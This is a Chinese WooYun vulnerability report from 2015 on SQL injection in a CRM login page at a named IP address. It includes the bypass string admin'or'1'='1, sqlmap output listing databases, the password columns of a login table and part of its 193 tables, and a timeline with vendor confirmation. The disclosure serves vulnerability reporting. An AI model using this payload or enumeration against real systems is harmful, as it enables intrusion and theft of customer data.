乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-10: 细节已通知厂商并且等待厂商处理中 2015-11-11: 厂商已经确认,细节仅向厂商公开 2015-11-21: 细节向核心白帽子及相关领域专家公开 2015-12-01: 细节向普通白帽子公开 2015-12-11: 细节向实习白帽子公开 2015-12-26: 细节向公众公开
问题这么严重,你的公司这么大,来点奖励!
第一次提交忘记给地址了,郁闷~
http://180.168.26.117:8000/8crm/login.php?msg=1
admin'or'1'='1admin'or'1'='1这么搞,客户都流失了
web server operating system: Windowsweb application technology: PHP 5.2.13, Apache 2.2.4back-end DBMS: MySQL 5.0.12[03:20:54] [INFO] fetching database names[03:20:54] [INFO] fetching number of databases[03:20:54] [INFO] resumed: 3[03:20:54] [INFO] resumed: information_schema[03:20:54] [INFO] resumed: crm_db[03:20:54] [INFO] resumed: mysqlavailable databases [3]:[*] crm_db[*] information_schema[*] mysql
Database: crm_dbTable: kis_login[3 columns]+------------+--------------+| Column | Type |+------------+--------------+| login_pwd | varchar(200) || login_uid | varchar(32) || login_uuid | varchar(50) |+------------+--------------+
[03:30:38] [INFO] fetching current database[03:30:38] [INFO] resumed: crm_db[03:30:38] [INFO] fetching tables for database: 'crm_db'[03:30:38] [INFO] fetching number of tables for database 'crm_db'[03:30:38] [INFO] resumed: 193[03:30:38] [INFO] resumed: kis_data[03:30:38] [INFO] resumed: kis_login[03:30:38] [INFO] resumed: kis_syn[03:30:38] [INFO] resumed: sms2[03:30:38] [INFO] resumed: tab_account_client[03:30:38] [INFO] resumed: tab_account_store[03:30:38] [INFO] resumed: tab_action[03:30:38] [INFO] resumed: tab_action_emp[03:30:38] [INFO] resumed: tab_action_histroy[03:30:38] [INFO] resumed: tab_actionhistroy_emp[03:30:38] [INFO] resumed: tab_activity_attend[03:30:38] [INFO] resumed: tab_activity_doc[03:30:38] [INFO] resumed: tab_activity_enroll[03:30:38] [INFO] resumed: tab_activity_linit
太长了,一共193张表,给力啊~~不深入测试了,这客户信息流出去了危害大啊!
这么搞,客户都流失了
有奖励,才有动力!
危害等级:高
漏洞Rank:15
确认时间:2015-11-11 10:14
谢谢发布,马上进行处理
暂无